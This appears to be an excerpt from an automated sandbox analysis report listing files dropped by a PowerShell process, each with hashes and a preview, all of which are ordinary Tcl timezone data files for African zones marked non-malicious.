                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):180
                                                                                                                                                                                                                      Entropy (8bit):4.866127364448228
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcqQFeDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DdD4yn
                                                                                                                                                                                                                      MD5:41209A335A99803239A854575190C5ED
                                                                                                                                                                                                                      SHA1:E6EA627C25513B9DDE053F9A24D509AA317C30A1
                                                                                                                                                                                                                      SHA-256:611375C4901AD6C4844C2BB7D02FB17F34996F49E642546A6784D6F0B28530CC
                                                                                                                                                                                                                      SHA-512:DF2C0B131F35F54DF5EBF7F8459F98DBABEB6F081247BA95B5D7B41146E2A2EF9BC6B1D909DE57A1223D9C258AB197D9668ED2E111A365C86BABDAA7DF551FB6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Kinshasa) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):235
                                                                                                                                                                                                                      Entropy (8bit):4.7936510664790815
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9eg/2D4JDm2OHWQvvoHvBsp9boFvoHzIX7uRe6vF9:MB862DymdHWQCvqpmVCzIq
                                                                                                                                                                                                                      MD5:EC08046589E85D999A597252FF5368B7
                                                                                                                                                                                                                      SHA1:126E3DE158E1E7AF4737D0AB5B51C0F92F416DC7
                                                                                                                                                                                                                      SHA-256:DCC9F52F539A67DFD7ABAFDE072ACDAE2B67754C559C8A5FE61979F5A286A066
                                                                                                                                                                                                                      SHA-512:84B9AB18BC343C8B8934F5FDD2E2EB413925B04D6F5394AA8337B7B55E6487FB071A83A69BD4D0FA40F7F31EBC57B9908729674542CEA3083D700FCD02D77633
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Lagos) {.. {-9223372036854775808 815 0 LMT}.. {-2035584815 0 0 GMT}.. {-1940889600 815 0 LMT}.. {-1767226415 1800 0 +0030}.. {-1588465800 3600 0 WAT}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):182
                                                                                                                                                                                                                      Entropy (8bit):4.865878143076229
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcr7bp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dgfp4D4y
                                                                                                                                                                                                                      MD5:35D8A58EE21E603C6FC4FB896AE6B3D0
                                                                                                                                                                                                                      SHA1:F1D0A939D761F3F0954F045814CF5339A5597036
                                                                                                                                                                                                                      SHA-256:AB3E797548C7663CF9ABA7FE163635FF7CAB9E6CB61FA1644C0F7B4B5CCE8B99
                                                                                                                                                                                                                      SHA-512:97717961987F6B6832C24A7833150CDFE7E82BBEB32DFDB84D2500442AAD9263F8BD4E879591E913D56E9A1991C389EF730211853647A889F358AE3FA37C0185
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Libreville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):182
                                                                                                                                                                                                                      Entropy (8bit):4.862780607964543
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcih4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DNh4D4
                                                                                                                                                                                                                      MD5:EA21ABBF8B11953916A1C509B8A1B427
                                                                                                                                                                                                                      SHA1:35ADC230C57B001BE8A99A3D2E34B609A60A1162
                                                                                                                                                                                                                      SHA-256:EACA9124F17E5B11F27D11FA6141D19EB3AC23E155E155B73467BDAA3BC99AA7
                                                                                                                                                                                                                      SHA-512:A7972D4F1C5FB988CA04B39E2CDD580F51383BA9D7A66C478275C11A07B8D7A6EFF53A3E1929B0D89F10BCC39D22F285DB2601ED60DB4647C65465643F70C137
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Lome) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):178
                                                                                                                                                                                                                      Entropy (8bit):4.856982839546061
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DccLtBQDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DXQD4yn
                                                                                                                                                                                                                      MD5:40CD47F6DCF51EBEFEF42489F1716257
                                                                                                                                                                                                                      SHA1:DF245192A1899A72DE01A57F6969AC060E841734
                                                                                                                                                                                                                      SHA-256:4C2FD1E44DFAAF0C0DD2EB56B84B538F1E2D84B301AB2CFB8EE7759783501444
                                                                                                                                                                                                                      SHA-512:D39BEB0EEF344B1A44F7D6A806A1D5B956D7D402648EE0C67C4BA46493236840AF975D89A91B2D33B8AA7D6DC9A051E66718DCDBC1C83B0E964215C2E32ED923
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Luanda) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):185
                                                                                                                                                                                                                      Entropy (8bit):4.940313336280723
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcfpT0DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2D8pT0Dt
                                                                                                                                                                                                                      MD5:71A5DE1276902DB1542840318F9B1AF3
                                                                                                                                                                                                                      SHA1:AC3825BF343482E0E4D9D6FAA6FCA4D1A125433B
                                                                                                                                                                                                                      SHA-256:24384EEC359FD24D181AAEF3C017E3C345490A8D352B29D19B1B143A29A811C2
                                                                                                                                                                                                                      SHA-512:2984EB42A79B8B32BB93DFE71F1C4C0CABFDC9B0A199971347BB3473463FA07FDB5D20227D288BF8653B1BDE347E1297459BBB4C3C34AF7A5434FBF945683577
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lubumbashi) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):181
                                                                                                                                                                                                                      Entropy (8bit):4.905174746463853
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcOf+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkDEi
                                                                                                                                                                                                                      MD5:1D7FDB388535CC59742CA0F1AEE27FBD
                                                                                                                                                                                                                      SHA1:A99FF2CAC47FD333429C22B271E190D979EEC024
                                                                                                                                                                                                                      SHA-256:B00801A7279741434D9C2D7EC7322DD93B85EA4F5C9976AB3A43F0AB142E1553
                                                                                                                                                                                                                      SHA-512:0174D3C6F9116C36C62AD1EB58203EE7DFE8C37F618B8449D5E45AD6290CF8334F28798877D7A563A12EE533026244D6A49BCCF29B5D7FCB5BCC91481D0DDDE2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lusaka) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):178
                                                                                                                                                                                                                      Entropy (8bit):4.857096806490649
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcn2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D42D4yn
                                                                                                                                                                                                                      MD5:1CA9B3E7BCD5BC1CC881453D16B09389
                                                                                                                                                                                                                      SHA1:1B1964B314E72847D71A42C147CF2BF331B44461
                                                                                                                                                                                                                      SHA-256:35D56EFFE9E7E60F17B32BD30486E566B635F0AE7A8948D77395B8E6332E26F1
                                                                                                                                                                                                                      SHA-512:9E08D57B7824F5B076D159D9A5106E51450DF24729C36F485B9B68E8F47E8DFC50F9BEC3F11E0AE6579A8E372A5C0F0DA18A2E797CF2115519D1B4E5B64413DD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Malabo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):149
                                                                                                                                                                                                                      Entropy (8bit):4.952872531197478
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QF08x/2DcfKiMXGm2OHoVoHvdSF2I:SlSWB9eg/2DEZDm2OHoVoHvdI
                                                                                                                                                                                                                      MD5:CD429B6891CBF603A93F9A9733E2391B
                                                                                                                                                                                                                      SHA1:C6833B83B6D1694AC632018A27915E6F97F708AE
                                                                                                                                                                                                                      SHA-256:FE6B6A4BE1B61F7F909A3F6137530DFE6D1754499A4D9B0D1CE4952FFF0AE62D
                                                                                                                                                                                                                      SHA-512:6E57B70B71515998AD617954F9DDAE19968B20946542201153DAB47FBE63790D42F41AE29148ECBCE6D12812879BCF0A4EC881507B62CDB2675AB20267220BF9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Maputo) {.. {-9223372036854775808 7820 0 LMT}.. {-2109291020 7200 0 CAT}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):199
                                                                                                                                                                                                                      Entropy (8bit):4.964472328419063
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DZQs+DWb4n:MByMaHw7NH/t2DZiDWU
                                                                                                                                                                                                                      MD5:88C8FF2B480648EDADBD0FB93F754275
                                                                                                                                                                                                                      SHA1:BED7A784C378909914CEB0D303DFE6D05FD576B7
                                                                                                                                                                                                                      SHA-256:1D80FD86CB733D57D88ECD404E702F750B233ED0CCBFBFFFEED1AAD3B7F1CB04
                                                                                                                                                                                                                      SHA-512:CB7F831CF099E85B948AE57FCE9D91C7EAAD39753AF82C56EC15B65830EB4115A71BBC83A71A2AC947CAB24DEDDB557E02FAA5A3264546AE6E60607DF6BD2FA3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Maseru) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):200
                                                                                                                                                                                                                      Entropy (8bit):4.957246428185456
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DzjEHp4DWb4n:MByMaHw7NH/t2DzjEJ4DWU
                                                                                                                                                                                                                      MD5:CA7255B86425BA706D214924856B6818
                                                                                                                                                                                                                      SHA1:E9BE6CF871BB1786E842953D41392299952EC9AC
                                                                                                                                                                                                                      SHA-256:547197C09C1987350AE5720A4EEC7E8D8F4B9F4A0559726E225E13C707F7C564
                                                                                                                                                                                                                      SHA-512:23F9AD0F926A0945A17BBC3DCFF9A3D7EE68EC9423EA78985F5FFC60CC61641B57871F9AA703B5FB9BE842DCD4693D0641F9EDED702240873F58D24CD4D60C32
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Mbabane) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):187
                                                                                                                                                                                                                      Entropy (8bit):4.877126792757121
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcBEBXCEeDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DFSVDR
                                                                                                                                                                                                                      MD5:5C2E2B5189E0E816D5BD7AFC8B49A35E
                                                                                                                                                                                                                      SHA1:4E43A1ED51399528636D6442B1DDFFD820911407
                                                                                                                                                                                                                      SHA-256:25E221BE49DEC5547A74AEB91B0041859C59BC866987272A447AB2343D1CC30C
                                                                                                                                                                                                                      SHA-512:B74735CFAB692756BAADFB1A51A8CC0C986F981D8E7E7A8182370A9017E67439875F0115820A349AFB3BE2FA581A721440968EF817471DD2C5E1286E53B2FE99
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Mogadishu) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):208
                                                                                                                                                                                                                      Entropy (8bit):4.8660011420394955
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9eg/2D3NPDm2OHrFGxYoHvlHIg5pTwdPsy:MB862D3NbmdHhmYCvdIg5GPsy
                                                                                                                                                                                                                      MD5:1B3C94B5098E454981C73C1F2AF80164
                                                                                                                                                                                                                      SHA1:1EBA9E2DBEA70BB1AE5EB13739518AB5A62D2130
                                                                                                                                                                                                                      SHA-256:2BF0D90610211651127402680519B29AB50B15D344263D0C1A22EDEBE5E01E27
                                                                                                                                                                                                                      SHA-512:DA4A0BCE7C6750BD7D3BA76B6301B9390723BE0C001C39BE453D80BD87020C2253A75629F68F83C19410D2A75FAF5223A435299CD4AA53DE545EC7C5B5AA54B7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Monrovia) {.. {-9223372036854775808 -2588 0 LMT}.. {-2776979812 -2588 0 MMT}.. {-1604359012 -2670 0 MMT}.. {63593070 0 0 GMT}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):277
                                                                                                                                                                                                                      Entropy (8bit):4.655052651600954
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9eg/2Dk1Dm2OHsvT5oH99VCV22ufPnVCkVBKBQn9q:MB862DGmdHsvVCjkifvdH9q
                                                                                                                                                                                                                      MD5:B640661FB37BB74FAB172DBDF1B433E1
                                                                                                                                                                                                                      SHA1:0236A5B53443A4A18B8B9D6AA7732620BE9A6553
                                                                                                                                                                                                                      SHA-256:BD8E9765174431C0D403249D3E881C949C83966E9F8162552DA88AE53132467B
                                                                                                                                                                                                                      SHA-512:53DCC6DF7C3E0B00A6D98A8DCC4988C8CFD6B53CC89E6F8D32DA41CB532A62D9C6A823675C5039F5639CE0D423F6D571F46F5B93FFC7EFFB4EDFFBF89D46AA12
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Nairobi) {.. {-9223372036854775808 8836 0 LMT}.. {-1946168836 9000 0 +0230}.. {-1309746600 10800 0 EAT}.. {-1261969200 9000 0 +0230}.. {-1041388200 9900 0 +0245}.. {-865305900 10800 0 EAT}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):208
                                                                                                                                                                                                                      Entropy (8bit):4.856754881865487
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9eg/2DjUfDm2OHNseoH1axCXFHzaSmkFWTvF9:MB862DjULmdHPC1XNzaS3yz
                                                                                                                                                                                                                      MD5:EDB548348E590C8CFE04ED172D96B86C
                                                                                                                                                                                                                      SHA1:AD3B631FB03819772164402E202AFA781687F597
                                                                                                                                                                                                                      SHA-256:9ADA5F5AFB25E823E1F0E8AD2489AAA1C09F01356634A9403670D7AB21CA2E2C
                                                                                                                                                                                                                      SHA-512:17E396A9BE497077B774AD1108CC8760ED35FC92F65FFF070F9ACD3C4FB67A335C1C57DF1CCB1570DE14B708EFCA0063990A969E30759C9A47731DA45ED25EFE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Ndjamena) {.. {-9223372036854775808 3612 0 LMT}.. {-1830387612 3600 0 WAT}.. {308703600 7200 1 WAST}.. {321314400 3600 0 WAT}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):178
                                                                                                                                                                                                                      Entropy (8bit):4.871519187180041
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcdhA9Ff2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dsh2f2D1
                                                                                                                                                                                                                      MD5:0134039CD1666E983A9B6E43ABD6AF59
                                                                                                                                                                                                                      SHA1:A2A99345390F4D17C892CEADE58C604257686764
                                                                                                                                                                                                                      SHA-256:B517120AD8DB3F21EAB4E44A78001EE856EB4EA35852C54CCA96D38887DEBCFA
                                                                                                                                                                                                                      SHA-512:E5911ADD3D776D87ACFC986C4D2564E3ED9AB12C67F23391ED35FF2A31AD8314B873E31DB8DA4D5E0DAEA12BE34110A8F0C27C9C6126977BAD51C6AD5CDFA39B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Niamey) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):188
                                                                                                                                                                                                                      Entropy (8bit):4.909962899502589
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcboGb+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dqbb+c
                                                                                                                                                                                                                      MD5:550E482599C2F4280F2C258019BB2547
                                                                                                                                                                                                                      SHA1:A39045BEF313094CEDC100A7D695AE51BC9E498D
                                                                                                                                                                                                                      SHA-256:64CAF2BF9D45095DF97F419714D5617CF6300ACDB544B621DCE1D594AA9B910C
                                                                                                                                                                                                                      SHA-512:4FD29C5B4C0D2BDE69C437E9BF4F08A11E1DAAA689B69F28F3551F550BDCCDD055E4C1A241EDB2FA48B18825AFF792F4860F55983E106EA8224F1D87ED4F7546
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Nouakchott) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):189
                                                                                                                                                                                                                      Entropy (8bit):4.920023025906233
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcXCZDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2D1DBS
                                                                                                                                                                                                                      MD5:6CFC4E938E50C9B591F8CC42A14FA82A
                                                                                                                                                                                                                      SHA1:FCE14A5CA62C9005C76D27B849A238E76C834F8A
                                                                                                                                                                                                                      SHA-256:03B9C1FE350B5E9F6F333F9519FA394DCC562308D9388A903AF3D3FECEBDC762
                                                                                                                                                                                                                      SHA-512:98F22F1D23A9930276A2D306A1473E64DC43547A16CFD01226E4F030A26A3CC4FDED77F790583CC5C078FC6DFCCE81C16A50879AE46A0D3A6F1FA98373F413C7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Ouagadougou) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):182
                                                                                                                                                                                                                      Entropy (8bit):4.893842293207225
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcyTKM0DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DQD4yn
                                                                                                                                                                                                                      MD5:6D979FCD225D5431C7391AE568C6409F
                                                                                                                                                                                                                      SHA1:6C9DCD222061CC00FD386773C6BB2861F3429A60
                                                                                                                                                                                                                      SHA-256:8FB8692DB9281AE2B087D704168BFD47D3D0901781FEF65BFD62FCB213BA6B50
                                                                                                                                                                                                                      SHA-512:32AFA6AF6BFC3D42CA636DD2B96906048EF1ADFBB135BB7E7B77C444FED99FDABB84FBBADF56EC63828FFA7B3371191FF1311822B1C75241EBD9CF602467088E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Porto-Novo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):234
                                                                                                                                                                                                                      Entropy (8bit):4.818597723513168
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9eg/2DXDm2OHH5oHvzdoH1aNbbFHRMy:MB862DTmdHH5CvzdC16bZRMy
                                                                                                                                                                                                                      MD5:28A5967C797F4B38FB63F823D6F07168
                                                                                                                                                                                                                      SHA1:17872E91683B884191D2E4C777FB79DCE6D73EE7
                                                                                                                                                                                                                      SHA-256:BA1D60DF2B41320F92A123A714E17E576C89383526B96E0541A464C3FBA415B7
                                                                                                                                                                                                                      SHA-512:B335E3D3268631F3A71F4BAD59740F3A5222344E8223C201B8FE885BAA7F1A550FA7778E498D6DC2111F41053856F50B21413AECCE84B80833EC8176F2A1009C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Sao_Tome) {.. {-9223372036854775808 1616 0 LMT}.. {-2713912016 -2205 0 LMT}.. {-1830384000 0 0 GMT}.. {1514768400 3600 0 WAT}.. {1546304400 0 0 GMT}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):186
                                                                                                                                                                                                                      Entropy (8bit):4.905303708777235
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcHdDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwdDBS
                                                                                                                                                                                                                      MD5:F2D7F7BC4EA3629EC7F0E45300A0CFD2
                                                                                                                                                                                                                      SHA1:E7594D378C5DCFEB1E87E13AC79A026260D2E630
                                                                                                                                                                                                                      SHA-256:9D8009ACAB019B32B1E87AB10E0AC3765ABCABE8066318DA8CA4905D41562F72
                                                                                                                                                                                                                      SHA-512:795E58172907020C85CF0B10BBA35842D5F92872CCB3382DFDC787BAA504C79927FA23BC3104AD63541A95C44CA80977E8247846DE918A0B00963B970F4823D2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Timbuktu) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):954
                                                                                                                                                                                                                      Entropy (8bit):4.151253074491018
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:MB862DrmdHrCDWR+f7Zn9ueRSmNvlTtuyI/ZBv8dq8Jw4VFZBZYEuAENSfp8kSYx:5veuDkWx3NdT18kbjjAkxTx
                                                                                                                                                                                                                      MD5:2DF9B050D82B06EB89DA908C31C1F1C9
                                                                                                                                                                                                                      SHA1:CB294E12560A98D5CEA3BA7004B5519B6C22BAAC
                                                                                                                                                                                                                      SHA-256:B447B6B1C351E77F22A2D77C0437F2BBB7D8BDFDFDC3D6285E0D260519CC7110
